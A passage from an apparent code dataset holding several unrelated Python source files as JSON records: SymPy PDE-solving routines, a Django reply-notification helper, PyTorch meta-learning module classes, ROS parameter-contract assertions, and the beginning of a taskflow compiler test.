for\n # solving systems of ODE's, this can be extended to n variables.\n xi, eta = symbols(\"xi eta\")\n f = func.func\n x = func.args[0]\n y = func.args[1]\n b = match[match['b']]\n c = match[match['c']]\n d = match[match['d']]\n e = -match[match['e']]\n expterm = exp(-S(d)/(b**2 + c**2)*xi)\n functerm = solvefun(eta)\n solvedict = solve((b*x + c*y - xi, c*x - b*y - eta), x, y)\n # Integral should remain as it is in terms of xi,\n # doit() should be done in _handle_Integral.\n genterm = (1/S(b**2 + c**2))*Integral(\n (1/expterm*e).subs(solvedict), (xi, b*x + c*y))\n return Eq(f(x,y), Subs(expterm*(functerm + genterm),\n (eta, xi), (c*x - b*y, b*x + c*y)))\n\n\ndef pde_1st_linear_variable_coeff(eq, func, order, match, solvefun):\n r\"\"\"\n Solves a first order linear partial differential equation\n with variable coefficients. The general form of this partial\n differential equation is\n\n .. math:: a(x, y) \\frac{\\partial f(x, y)}{\\partial x}\n + b(x, y) \\frac{\\partial f(x, y)}{\\partial y}\n + c(x, y) f(x, y) = G(x, y)\n\n where `a(x, y)`, `b(x, y)`, `c(x, y)` and `G(x, y)` are arbitrary\n functions in `x` and `y`. This PDE is converted into an ODE by\n making the following transformation:\n\n 1. `\\xi` as `x`\n\n 2. `\\eta` as the constant in the solution to the differential\n equation `\\frac{dy}{dx} = -\\frac{b}{a}`\n\n Making the previous substitutions reduces it to the linear ODE\n\n .. math:: a(\\xi, \\eta)\\frac{du}{d\\xi} + c(\\xi, \\eta)u - G(\\xi, \\eta) = 0\n\n which can be solved using ``dsolve``.\n\n >>> from sympy.abc import x, y\n >>> from sympy import Function, pprint\n >>> a, b, c, G, f= [Function(i) for i in ['a', 'b', 'c', 'G', 'f']]\n >>> u = f(x,y)\n >>> ux = u.diff(x)\n >>> uy = u.diff(y)\n >>> genform = a(x, y)*u + b(x, y)*ux + c(x, y)*uy - G(x,y)\n >>> pprint(genform)\n d d\n -G(x, y) + a(x, y)*f(x, y) + b(x, y)*--(f(x, y)) + c(x, y)*--(f(x, y))\n dx dy\n\n\n Examples\n ========\n\n >>> from sympy.solvers.pde import pdsolve\n >>> from sympy import Function, pprint\n >>> from sympy.abc import x,y\n >>> f = Function('f')\n >>> eq = x*(u.diff(x)) - y*(u.diff(y)) + y**2*u - y**2\n >>> pdsolve(eq)\n Eq(f(x, y), F(x*y)*exp(y**2/2) + 1)\n\n References\n ==========\n\n - Viktor Grigoryan, \"Partial Differential Equations\"\n Math 124A - Fall 2010, pp.7\n\n \"\"\"\n from sympy.solvers.ode import dsolve\n\n xi, eta = symbols(\"xi eta\")\n f = func.func\n x = func.args[0]\n y = func.args[1]\n b = match[match['b']]\n c = match[match['c']]\n d = match[match['d']]\n e = -match[match['e']]\n\n\n if not d:\n # To deal with cases like b*ux = e or c*uy = e\n if not (b and c):\n if c:\n try:\n tsol = integrate(e/c, y)\n except NotImplementedError:\n raise NotImplementedError(\"Unable to find a solution\"\n \" due to inability of integrate\")\n else:\n return Eq(f(x,y), solvefun(x) + tsol)\n if b:\n try:\n tsol = integrate(e/b, x)\n except NotImplementedError:\n raise NotImplementedError(\"Unable to find a solution\"\n \" due to inability of integrate\")\n else:\n return Eq(f(x,y), solvefun(y) + tsol)\n\n if not c:\n # To deal with cases when c is 0, a simpler method is used.\n # The PDE reduces to b*(u.diff(x)) + d*u = e, which is a linear ODE in x\n plode = f(x).diff(x)*b + d*f(x) - e\n sol = dsolve(plode, f(x))\n syms = sol.free_symbols - plode.free_symbols - {x, y}\n rhs = _simplify_variable_coeff(sol.rhs, syms, solvefun, y)\n return Eq(f(x, y), rhs)\n\n if not b:\n # To deal with cases when b is 0, a simpler method is used.\n # The PDE reduces to c*(u.diff(y)) + d*u = e, which is a linear ODE in y\n plode = f(y).diff(y)*c + d*f(y) - e\n sol = dsolve(plode, f(y))\n syms = sol.free_symbols - plode.free_symbols - {x, y}\n rhs = _simplify_variable_coeff(sol.rhs, syms, solvefun, x)\n return Eq(f(x, y), rhs)\n\n dummy = Function('d')\n h = (c/b).subs(y, dummy(x))\n sol = dsolve(dummy(x).diff(x) - h, dummy(x))\n if isinstance(sol, list):\n sol = sol[0]\n solsym = sol.free_symbols - h.free_symbols - {x, y}\n if len(solsym) == 1:\n solsym = solsym.pop()\n etat = (solve(sol, solsym)[0]).subs(dummy(x), y)\n ysub = solve(eta - etat, y)[0]\n deq = (b*(f(x).diff(x)) + d*f(x) - e).subs(y, ysub)\n final = (dsolve(deq, f(x), hint='1st_linear')).rhs\n if isinstance(final, list):\n final = final[0]\n finsyms = final.free_symbols - deq.free_symbols - {x, y}\n rhs = _simplify_variable_coeff(final, finsyms, solvefun, etat)\n return Eq(f(x, y), rhs)\n\n else:\n raise NotImplementedError(\"Cannot solve the partial differential equation due\"\n \" to inability of constantsimp\")\n\n\ndef _simplify_variable_coeff(sol, syms, func, funcarg):\n r\"\"\"\n Helper function to replace constants by functions in 1st_linear_variable_coeff\n \"\"\"\n eta = Symbol(\"eta\")\n if len(syms) == 1:\n sym = syms.pop()\n final = sol.subs(sym, func(funcarg))\n\n else:\n for key, sym in enumerate(syms):\n final = sol.subs(sym, func(funcarg))\n\n return simplify(final.subs(eta, funcarg))\n\n\ndef pde_separate(eq, fun, sep, strategy='mul'):\n \"\"\"Separate variables in partial differential equation either by additive\n or multiplicative separation approach. It tries to rewrite an equation so\n that one of the specified variables occurs on a different side of the\n equation than the others.\n\n :param eq: Partial differential equation\n\n :param fun: Original function F(x, y, z)\n\n :param sep: List of separated functions [X(x), u(y, z)]\n\n :param strategy: Separation strategy. You can choose between additive\n separation ('add') and multiplicative separation ('mul') which is\n default.\n\n Examples\n ========\n\n >>> from sympy import E, Eq, Function, pde_separate, Derivative as D\n >>> from sympy.abc import x, t\n >>> u, X, T = map(Function, 'uXT')\n\n >>> eq = Eq(D(u(x, t), x), E**(u(x, t))*D(u(x, t), t))\n >>> pde_separate(eq, u(x, t), [X(x), T(t)], strategy='add')\n [exp(-X(x))*Derivative(X(x), x), exp(T(t))*Derivative(T(t), t)]\n\n >>> eq = Eq(D(u(x, t), x, 2), D(u(x, t), t, 2))\n >>> pde_separate(eq, u(x, t), [X(x), T(t)], strategy='mul')\n [Derivative(X(x), (x, 2))/X(x), Derivative(T(t), (t, 2))/T(t)]\n\n See Also\n ========\n pde_separate_add, pde_separate_mul\n \"\"\"\n\n do_add = False\n if strategy == 'add':\n do_add = True\n elif strategy == 'mul':\n do_add = False\n else:\n raise ValueError('Unknown strategy: %s' % strategy)\n\n if isinstance(eq, Equality):\n if eq.rhs != 0:\n return pde_separate(Eq(eq.lhs - eq.rhs, 0), fun, sep, strategy)\n else:\n return pde_separate(Eq(eq, 0), fun, sep, strategy)\n\n if eq.rhs != 0:\n raise ValueError(\"Value should be 0\")\n\n # Handle arguments\n orig_args = list(fun.args)\n subs_args = []\n for s in sep:\n for j in range(0, len(s.args)):\n subs_args.append(s.args[j])\n\n if do_add:\n functions = reduce(operator.add, sep)\n else:\n functions = reduce(operator.mul, sep)\n\n # Check whether variables match\n if len(subs_args) != len(orig_args):\n raise ValueError(\"Variable counts do not match\")\n # Check for duplicate arguments like [X(x), u(x, y)]\n if has_dups(subs_args):\n raise ValueError(\"Duplicate substitution arguments detected\")\n # Check whether the variables match\n if set(orig_args) != set(subs_args):\n raise ValueError(\"Arguments do not match\")\n\n # Substitute original function with separated...\n result = eq.lhs.subs(fun, functions).doit()\n\n # Divide by terms when doing multiplicative separation\n if not do_add:\n eq = 0\n for i in result.args:\n eq += i/functions\n result = eq\n\n svar = subs_args[0]\n dvar = subs_args[1:]\n return _separate(result, svar, dvar)\n\n\ndef pde_separate_add(eq, fun, sep):\n \"\"\"\n Helper function for searching additive separable solutions.\n\n Consider an equation of two independent variables x, y and a dependent\n variable w, we look for the product of two functions depending on different\n arguments:\n\n `w(x, y, z) = X(x) + y(y, z)`\n\n Examples\n ========\n\n >>> from sympy import E, Eq, Function, pde_separate_add, Derivative as D\n >>> from sympy.abc import x, t\n >>> u, X, T = map(Function, 'uXT')\n\n >>> eq = Eq(D(u(x, t), x), E**(u(x, t))*D(u(x, t), t))\n >>> pde_separate_add(eq, u(x, t), [X(x), T(t)])\n [exp(-X(x))*Derivative(X(x), x), exp(T(t))*Derivative(T(t), t)]\n\n \"\"\"\n return pde_separate(eq, fun, sep, strategy='add')\n\n\ndef pde_separate_mul(eq, fun, sep):\n \"\"\"\n Helper function for searching multiplicative separable solutions.\n\n Consider an equation of two independent variables x, y and a dependent\n variable w, we look for the product of two functions depending on different\n arguments:\n\n `w(x, y, z) = X(x)*u(y, z)`\n\n Examples\n ========\n\n >>> from sympy import Function, Eq, pde_separate_mul, Derivative as D\n >>> from sympy.abc import x, y\n >>> u, X, Y = map(Function, 'uXY')\n\n >>> eq = Eq(D(u(x, y), x, 2), D(u(x, y), y, 2))\n >>> pde_separate_mul(eq, u(x, y), [X(x), Y(y)])\n [Derivative(X(x), (x, 2))/X(x), Derivative(Y(y), (y, 2))/Y(y)]\n\n \"\"\"\n return pde_separate(eq, fun, sep, strategy='mul')\n\n\ndef _separate(eq, dep, others):\n \"\"\"Separate expression into two parts based on dependencies of variables.\"\"\"\n\n # FIRST PASS\n # Extract derivatives depending our separable variable...\n terms = set()\n for term in eq.args:\n if term.is_Mul:\n for i in term.args:\n if i.is_Derivative and not i.has(*others):\n terms.add(term)\n continue\n elif term.is_Derivative and not term.has(*others):\n terms.add(term)\n # Find the factor that we need to divide by\n div = set()\n for term in terms:\n ext, sep = term.expand().as_independent(dep)\n # Failed?\n if sep.has(*others):\n return None\n div.add(ext)\n # FIXME: Find lcm() of all the divisors and divide with it, instead of\n # current hack :(\n # https://github.com/sympy/sympy/issues/4597\n if len(div) > 0:\n final = 0\n for term in eq.args:\n eqn = 0\n for i in div:\n eqn += term / i\n final += simplify(eqn)\n eq = final\n\n # SECOND PASS - separate the derivatives\n div = set()\n lhs = rhs = 0\n for term in eq.args:\n # Check, whether we have already term with independent variable...\n if not term.has(*others):\n lhs += term\n continue\n # ...otherwise, try to separate\n temp, sep = term.expand().as_independent(dep)\n # Failed?\n if sep.has(*others):\n return None\n # Extract the divisors\n div.add(sep)\n rhs -= term.expand()\n # Do the division\n fulldiv = reduce(operator.add, div)\n lhs = simplify(lhs/fulldiv).expand()\n rhs = simplify(rhs/fulldiv).expand()\n # ...and check whether we were successful :)\n if lhs.has(*others) or rhs.has(dep):\n return None\n return [lhs, rhs]\n"} {"ext": "py", "sha": "1a310bca53a1b5e608a90067a9814f4172b33a1f", "content": "from notifications.signals import notify\n\ndef notify_answer(request, topico, resposta):\n recipient = resposta.parent.user if resposta.parent else topico.user\n verb = 'responder'\n description = f'{recipient} respondeu seu post em {topico.titulo}.'\n url = topico.get_absolute_url() + f'#post{resposta.pk}'\n\n if request.user.pk != recipient.pk:\n notify.send(sender=request.user, recipient=recipient, target=topico, \n action_object=resposta, verb=verb, description=description, url=url)"} {"ext": "py", "sha": "1a310c17812bdb0293f2b1dbb41749e21abbc495", "content": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport torchvision\nfrom torch.autograd import Variable\nimport itertools\nimport operator\nfrom itertools import islice\nfrom collections import OrderedDict\n\ndef to_var(x, requires_grad=True):\n if torch.cuda.is_available():\n x = x.cuda()\n return Variable(x, requires_grad=requires_grad)\n\nclass MetaModule(nn.Module):\n # adopted from: Adrien Ecoffet https://github.com/AdrienLE\n def parameters(self):\n for name, param in self.named_params(self):\n yield param\n\n def named_parameters(self):\n for name, param in self.named_params(self):\n yield name, param\n \n def named_leaves(self):\n return []\n \n def named_submodules(self):\n return []\n \n def named_params(self, curr_module=None, memo=None, prefix=''): \n if memo is None:\n memo = set()\n\n if hasattr(curr_module, 'named_leaves'):\n for name, p in curr_module.named_leaves():\n if p is not None and p not in memo:\n memo.add(p)\n yield prefix + ('.' if prefix else '') + name, p\n else:\n for name, p in curr_module._parameters.items():\n if p is not None and p not in memo:\n memo.add(p)\n yield prefix + ('.' if prefix else '') + name, p\n \n for mname, module in curr_module.named_children():\n submodule_prefix = prefix + ('.' if prefix else '') + mname\n for name, p in self.named_params(module, memo, submodule_prefix):\n yield name, p\n \n def update_params(self, lr_inner, first_order=False, source_params=None, detach=False):\n if source_params is not None:\n for tgt, src in zip(self.named_params(self), source_params):\n name_t, param_t = tgt\n # name_s, param_s = src\n # grad = param_s.grad\n # name_s, param_s = src\n grad = src\n if first_order:\n grad = to_var(grad.detach().data)\n tmp = param_t - lr_inner * grad\n self.set_param(self, name_t, tmp)\n else:\n for name, param in self.named_params(self):\n if not detach:\n grad = param.grad\n if first_order:\n grad = to_var(grad.detach().data)\n tmp = param - lr_inner * grad\n self.set_param(self, name, tmp)\n else:\n param = param.detach_()\n self.set_param(self, name, param)\n\n def set_param(self,curr_mod, name, param):\n if '.' in name:\n n = name.split('.')\n module_name = n[0]\n rest = '.'.join(n[1:])\n for name, mod in curr_mod.named_children():\n if module_name == name:\n self.set_param(mod, rest, param)\n break\n else:\n setattr(curr_mod, name, param)\n \n def detach_params(self):\n for name, param in self.named_params(self):\n self.set_param(self, name, param.detach()) \n \n def copy(self, other, same_var=False):\n for name, param in other.named_params():\n if not same_var:\n param = to_var(param.data.clone(), requires_grad=True)\n self.set_param(name, param)\n\n\nclass MetaLinear(MetaModule):\n def __init__(self, *args, **kwargs):\n super().__init__()\n ignore = nn.Linear(*args, **kwargs)\n \n self.register_buffer('weight', to_var(ignore.weight.data, requires_grad=True))\n self.register_buffer('bias', to_var(ignore.bias.data, requires_grad=True))\n self.in_features = ignore.weight.size(1)\n self.out_features = ignore.weight.size(0)\n \n def forward(self, x):\n return F.linear(x, self.weight, self.bias)\n \n def named_leaves(self):\n return [('weight', self.weight), ('bias', self.bias)]\n \n\n\n\n\nclass MetaSequential(MetaModule):\n r\"\"\"A sequential container.\n Modules will be added to it in the order they are passed in the constructor.\n Alternatively, an ordered dict of modules can also be passed in.\n\n To make it easier to understand, here is a small example::\n\n # Example of using Sequential\n model = MetaSequential(\n MetaConv2d(1,20,5),\n nn.ReLU(),\n MetaConv2d(20,64,5),\n nn.ReLU()\n )\n\n # Example of using Sequential with OrderedDict\n model = MetaSequential(OrderedDict([\n ('conv1', MetaConv2d(1,20,5)),\n ('relu1', nn.ReLU()),\n ('conv2', MetaConv2d(20,64,5)),\n ('relu2', nn.ReLU())\n ]))\n \"\"\"\n\n def __init__(self, *args):\n super(MetaSequential, self).__init__()\n if len(args) == 1 and isinstance(args[0], OrderedDict):\n for key, module in args[0].items():\n self.add_module(key, module)\n else:\n for idx, module in enumerate(args):\n self.add_module(str(idx), module)\n\n def _get_item_by_idx(self, iterator, idx):\n \"\"\"Get the idx-th item of the iterator\"\"\"\n size = len(self)\n idx = operator.index(idx)\n if not -size <= idx < size:\n raise IndexError('index {} is out of range'.format(idx))\n idx %= size\n return next(islice(iterator, idx, None))\n\n def __getitem__(self, idx):\n if isinstance(idx, slice):\n return self.__class__(OrderedDict(list(self._modules.items())[idx]))\n else:\n return self._get_item_by_idx(self._modules.values(), idx)\n\n def __setitem__(self, idx, module):\n key = self._get_item_by_idx(self._modules.keys(), idx)\n return setattr(self, key, module)\n\n def __delitem__(self, idx):\n if isinstance(idx, slice):\n for key in list(self._modules.keys())[idx]:\n delattr(self, key)\n else:\n key = self._get_item_by_idx(self._modules.keys(), idx)\n delattr(self, key)\n\n def __len__(self):\n return len(self._modules)\n\n def __dir__(self):\n keys = super(Sequential, self).__dir__()\n keys = [key for key in keys if not key.isdigit()]\n return keys\n\n def forward(self, input):\n for module in self._modules.values():\n input = module(input)\n return input\n\n\nclass MetaModuleList(MetaModule):\n r\"\"\"Holds submodules in a list.\n\n :class:`~MetaModuleList` can be indexed like a regular Python list, but\n modules it contains are properly registered, and will be visible by all\n :class:`~MetaModule` methods.\n\n Arguments:\n modules (iterable, optional): an iterable of modules to add\n\n Example::\n\n class MyModule(MetaModule):\n def __init__(self):\n super(MyModule, self).__init__()\n self.linears = MetaModuleList([MetaLinear(10, 10) for i in range(10)])\n\n def forward(self, x):\n # ModuleList can act as an iterable, or be indexed using ints\n for i, l in enumerate(self.linears):\n x = self.linears[i // 2](x) + l(x)\n return x\n \"\"\"\n\n def __init__(self, modules=None):\n super(MetaModuleList, self).__init__()\n if modules is not None:\n self += modules\n\n def _get_abs_string_index(self, idx):\n \"\"\"Get the absolute index for the list of modules\"\"\"\n idx = operator.index(idx)\n if not (-len(self) <= idx < len(self)):\n raise IndexError('index {} is out of range'.format(idx))\n if idx < 0:\n idx += len(self)\n return str(idx)\n\n def __getitem__(self, idx):\n if isinstance(idx, slice):\n return self.__class__(list(self._modules.values())[idx])\n else:\n return self._modules[self._get_abs_string_index(idx)]\n\n def __setitem__(self, idx, module):\n idx = self._get_abs_string_index(idx)\n return setattr(self, str(idx), module)\n\n def __delitem__(self, idx):\n if isinstance(idx, slice):\n for k in range(len(self._modules))[idx]:\n delattr(self, str(k))\n else:\n delattr(self, self._get_abs_string_index(idx))\n # To preserve numbering, self._modules is being reconstructed with modules after deletion\n str_indices = [str(i) for i in range(len(self._modules))]\n self._modules = OrderedDict(list(zip(str_indices, self._modules.values())))\n\n def __len__(self):\n return len(self._modules)\n\n def __iter__(self):\n return iter(self._modules.values())\n\n def __iadd__(self, modules):\n return self.extend(modules)\n\n def __dir__(self):\n keys = super(ModuleList, self).__dir__()\n keys = [key for key in keys if not key.isdigit()]\n return keys\n\n def insert(self, index, module):\n r\"\"\"Insert a given module before a given index in the list.\n\n Arguments:\n index (int): index to insert.\n module (MetaModule): module to insert\n \"\"\"\n for i in range(len(self._modules), index, -1):\n self._modules[str(i)] = self._modules[str(i - 1)]\n self._modules[str(index)] = module\n\n\n def append(self, module):\n r\"\"\"Appends a given module to the end of the list.\n\n Arguments:\n module (MetaModule): module to append\n \"\"\"\n self.add_module(str(len(self)), module)\n return self\n\n\n def extend(self, modules):\n r\"\"\"Appends modules from a Python iterable to the end of the list.\n\n Arguments:\n modules (iterable): iterable of modules to append\n \"\"\"\n if not isinstance(modules, container_abcs.Iterable):\n raise TypeError(\"ModuleList.extend should be called with an \"\n \"iterable, but got \" + type(modules).__name__)\n offset = len(self)\n for i, module in enumerate(modules):\n self.add_module(str(offset + i), module)\n return self\n\n\n\nclass ModuleDict(MetaModule):\n r\"\"\"Holds submodules in a dictionary.\n\n :class:`~MetaModuleDict` can be indexed like a regular Python dictionary,\n but modules it contains are properly registered, and will be visible by all\n :class:`~MetaModule` methods.\n\n :class:`~MetaModuleDict` is an **ordered** dictionary that respects\n\n * the order of insertion, and\n\n * in :meth:`~MetaModuleDict.update`, the order of the merged ``OrderedDict``\n or another :class:`~MetaModuleDict` (the argument to :meth:`~MetaModuleDict.update`).\n\n Note that :meth:`~MetaModuleDict.update` with other unordered mapping\n types (e.g., Python's plain ``dict``) does not preserve the order of the\n merged mapping.\n\n Arguments:\n modules (iterable, optional): a mapping (dictionary) of (string: module)\n or an iterable of key-value pairs of type (string, module)\n\n Example::\n\n class MyModule(MetaModule):\n def __init__(self):\n super(MyModule, self).__init__()\n self.choices = MetaModuleDict({\n 'conv': MetaConv2d(10, 10, 3),\n 'pool': nn.MaxPool2d(3)\n })\n self.activations = MetaModuleDict([\n ['lrelu', nn.LeakyReLU()],\n ['prelu', nn.PReLU()]\n ])\n\n def forward(self, x, choice, act):\n x = self.choices[choice](x)\n x = self.activations[act](x)\n return x\n \"\"\"\n\n def __init__(self, modules=None):\n super(MetaModuleDict, self).__init__()\n if modules is not None:\n self.update(modules)\n\n def __getitem__(self, key):\n return self._modules[key]\n\n def __setitem__(self, key, module):\n self.add_module(key, module)\n\n def __delitem__(self, key):\n del self._modules[key]\n\n def __len__(self):\n return len(self._modules)\n\n def __iter__(self):\n return iter(self._modules)\n\n def __contains__(self, key):\n return key in self._modules\n\n def clear(self):\n \"\"\"Remove all items from the ModuleDict.\n \"\"\"\n self._modules.clear()\n\n\n def pop(self, key):\n r\"\"\"Remove key from the ModuleDict and return its module.\n\n Arguments:\n key (string): key to pop from the ModuleDict\n \"\"\"\n v = self[key]\n del self[key]\n return v\n\n\n def keys(self):\n r\"\"\"Return an iterable of the ModuleDict keys.\n \"\"\"\n return self._modules.keys()\n\n\n def items(self):\n r\"\"\"Return an iterable of the ModuleDict key/value pairs.\n \"\"\"\n return self._modules.items()\n\n\n def values(self):\n r\"\"\"Return an iterable of the ModuleDict values.\n \"\"\"\n return self._modules.values()\n\n\n def update(self, modules):\n r\"\"\"Update the :class:`~MetaModuleDict` with the key-value pairs from a\n mapping or an iterable, overwriting existing keys.\n\n .. note::\n If :attr:`modules` is an ``OrderedDict``, a :class:`~MetaModuleDict`, or\n an iterable of key-value pairs, the order of new elements in it is preserved.\n\n Arguments:\n modules (iterable): a mapping (dictionary) from string to :class:`~MetaModule`,\n or an iterable of key-value pairs of type (string, :class:`~MetaModule`)\n \n \"\"\"\n if not isinstance(modules, container_abcs.Iterable):\n raise TypeError(\"ModuleDict.update should be called with an \"\n \"iterable of key/value pairs, but got \" +\n type(modules).__name__)\n\n if isinstance(modules, container_abcs.Mapping):\n if isinstance(modules, (OrderedDict, ModuleDict)):\n for key, module in modules.items():\n self[key] = module\n else:\n for key, module in sorted(modules.items()):\n self[key] = module\n else:\n for j, m in enumerate(modules):\n if not isinstance(m, container_abcs.Iterable):\n raise TypeError(\"ModuleDict update sequence element \"\n \"#\" + str(j) + \" should be Iterable; is\" +\n type(m).__name__)\n if not len(m) == 2:\n raise ValueError(\"ModuleDict update sequence element \"\n \"#\" + str(j) + \" has length \" + str(len(m)) +\n \"; 2 is required\")\n self[m[0]] = m[1]\n\n def forward(self):\n raise NotImplementedError()\n\n\n\nclass LeNet(MetaModule):\n def __init__(self, n_out):\n super(LeNet, self).__init__()\n \n layers = []\n layers.append(MetaConv2d(1, 6, kernel_size=5))\n layers.append(nn.ReLU(inplace=True))\n layers.append(nn.MaxPool2d(kernel_size=2,stride=2))\n\n layers.append(MetaConv2d(6, 16, kernel_size=5))\n layers.append(nn.ReLU(inplace=True))\n layers.append(nn.MaxPool2d(kernel_size=2,stride=2))\n \n layers.append(MetaConv2d(16, 120, kernel_size=5))\n layers.append(nn.ReLU(inplace=True))\n \n self.main = nn.Sequential(*layers)\n \n layers = []\n layers.append(MetaLinear(120, 84))\n layers.append(nn.ReLU(inplace=True))\n layers.append(MetaLinear(84, n_out))\n \n self.fc_layers = nn.Sequential(*layers)\n \n def forward(self, x):\n x = self.main(x)\n x = x.view(-1, 120)\n return self.fc_layers(x).squeeze()\n"} {"ext": "py", "sha": "1a310d07ee210eb8ddec1a5bbd788d533dde86d5", "content": "#!/usr/bin/env python\n# Software License Agreement (Apache License 2.0)\n#\n# Copyright 2017 Florian Kromer\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport rospy\n\nclass ParameterContractViolation(Exception):\n \"\"\"\n Basic exception for contract violations raised by parameters.\n \"\"\"\n def __init__(self, name, msg=None):\n if msg is None:\n # default error message\n msg = \"Contract violation of parameter %s\" % name\n super(ParameterContractViolation, self).__init__(msg)\n # make name accessible for exception handling\n self.name = name\n\nclass ParameterValueViolation(ParameterContractViolation):\n \"\"\"\n Exception for value contract violations raised by parameters.\n \"\"\"\n def __init__(self, name, value):\n super(ParameterValueViolation, self).__init__(\n name, msg=\"Parameter %s violated contract with value %s\" % (name, value))\n self.value = value\n\ndef _check_parameter_exists(name):\n \"\"\"\n Checks if a parameter exists.\n\n Args:\n name (string): Name of the parameter.\n Returns:\n bool: True if existing, False if not existing.\n \"\"\"\n if rospy.has_param(name):\n return True\n return False\n\ndef assert_parameter_exists(name):\n \"\"\"\n Indicates a contract violation if the parameter is expected to exist but if\n it does not exist by raising an exception.\n\n Args:\n name (string): Name of the parameter.\n\n Raises:\n ParameterContractViolation: Raised if parameter is not existing.\n \"\"\"\n if not _check_parameter_exists(name):\n raise ParameterContractViolation(name, \"Parameter %s not existing\" % (name))\n\ndef enforce_parameter_exists(name):\n \"\"\"\n Indicates a contract violation if the parameter is expected to exist but if\n it does not exist by logging or diagnostics.\n\n Args:\n name (string): Name of the parameter.\n \"\"\"\n if not _check_parameter_exists(name):\n rospy.logwarn(\"Parameter %s not existing\" % (name))\n\ndef assert_parameter_not_exists(name):\n \"\"\"\n Indicates a contract violation if the parameter is expected to not exist but\n if it does exist.\n\n Args:\n name (string): Name of the parameter.\n\n Raises:\n ParameterContractViolation: Raised if parameter is existing.\n \"\"\"\n if rospy.has_param(name):\n raise ParameterContractViolation(name, \"Parameter %s existing\" % (name))\n\ndef assert_parameter_has_value(name, value):\n \"\"\"\n Indicates a contract violation if it is expected that the parameter has a\n specific value but if it has not.\n\n Args:\n name (string): Name of the parameter.\n value (depends on the parameter type): Value of the parameter.\n\n Raises:\n ParameterValueViolation: Raised if parameter value is not like expected.\n \"\"\"\n if rospy.has_param(name):\n observed_value = rospy.get_param(name)\n if value != observed_value:\n ParameterValueViolation(name, value)\n else:\n raise ParameterContractViolation(name, \"Parameter %s not existing\" % (name))\n\ndef assert_parameter_in_range(name, lower_bound, upper_bound):\n \"\"\"\n Indicates a contract violation if it is expected that a parameter value of\n type 32-bit integers has a value within a defined range but if it has not.\n\n Args:\n name (string): Name of the parameter.\n\n Raises:\n ParameterValueViolation: Raised if parameter value is not in the range.\n ParameterContractViolation: Raised if parameter does not exist.\n \"\"\"\n if rospy.has_param(name):\n value = rospy.get_param(name)\n if lower_bound > value > upper_bound:\n raise ParameterValueViolation(name, value)\n else:\n raise ParameterContractViolation(name, \"Parameter %s not existing\" % (name))\n\ndef assert_parameter_out_range(name, lower_bound, upper_bound):\n \"\"\"\n Indicates a contract violation if it is expected that a parameter value of\n type 32-bit integers has a value outside a defined range but if it has not.\n\n Args:\n name (string): Name of the parameter.\n\n Raises:\n ParameterValueViolation: Raised if parameter value is not outside the range.\n ParameterContractViolation: Raised if parameter does not exist.\n \"\"\"\n if rospy.has_param(name):\n value = rospy.get_param(name)\n if lower_bound > value > upper_bound:\n raise ParameterValueViolation(name, value)\n else:\n raise ParameterContractViolation(name, \"Parameter %s not existing\" % (name))\n"} {"ext": "py", "sha": "1a310d12195444f1e28dfdb77c76764ad77f7c0a", "content": "# -*- coding: utf-8 -*-\n\n# Copyright (C) 2012 Yahoo! Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom taskflow import engines\nfrom taskflow.engines.action_engine import compiler\nfrom taskflow import exceptions as exc\nfrom taskflow.patterns import graph_flow as gf\nfrom taskflow.patterns import linear_flow as lf\nfrom taskflow.patterns import unordered_flow as uf\nfrom taskflow import retry\nfrom taskflow import test\nfrom taskflow.tests import utils as test_utils\n\n\ndef _replicate_graph_with_names(compilation):\n # Turn a graph of nodes into a graph of names only so that\n # testing can use those names instead of having to use the exact\n # node objects themselves (which is problematic for any end nodes that\n # are added into the graph *dynamically*, and are not there in the\n # original/source flow).\n g = compilation.execution_graph\n n_g = g.__class__(name=g.name)\n for node, node_data in g.nodes_iter(data=True):\n n_g.add_node(node.name, attr_dict=node_data)\n for u, v, u_v_data in g.edges_iter(data=True):\n n_g.add_edge(u.name, v.name, attr_dict=u_v_data)\n return n_g\n\n\nclass PatternCompileTest(test.TestCase):\n def test_task(self):\n task = test_utils.DummyTask(name='a')\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(task).compile())\n self.assertEqual(['a'], list(g.nodes()))\n self.assertEqual([], list(g.edges()))\n\n def test_retry(self):\n r = retry.AlwaysRevert('r1')\n self.assertRaises(TypeError, compiler.PatternCompiler(r).compile)\n\n def test_wrong_object(self):\n msg_regex = '^Unknown object .* requested to compile'\n self.assertRaisesRegex(TypeError, msg_regex,\n compiler.PatternCompiler(42).compile)\n\n def test_empty(self):\n flo = lf.Flow(\"test\")\n compiler.PatternCompiler(flo).compile()\n\n def test_linear(self):\n a, b, c, d = test_utils.make_many(4)\n flo = lf.Flow(\"test\")\n flo.add(a, b, c)\n inner_flo = lf.Flow(\"sub-test\")\n inner_flo.add(d)\n flo.add(inner_flo)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(8, len(g))\n\n order = g.topological_sort()\n self.assertEqual(['test', 'a', 'b', 'c',\n \"sub-test\", 'd', \"sub-test[$]\",\n 'test[$]'], order)\n self.assertTrue(g.has_edge('c', \"sub-test\"))\n self.assertTrue(g.has_edge(\"sub-test\", 'd'))\n self.assertEqual({'invariant': True},\n g.get_edge_data(\"sub-test\", 'd'))\n self.assertEqual(['test[$]'], list(g.no_successors_iter()))\n self.assertEqual(['test'], list(g.no_predecessors_iter()))\n\n def test_invalid(self):\n a, b, c = test_utils.make_many(3)\n flo = lf.Flow(\"test\")\n flo.add(a, b, c)\n flo.add(flo)\n self.assertRaises(ValueError,\n compiler.PatternCompiler(flo).compile)\n\n def test_unordered(self):\n a, b, c, d = test_utils.make_many(4)\n flo = uf.Flow(\"test\")\n flo.add(a, b, c, d)\n\n g = _replicate_graph_with_names(\n 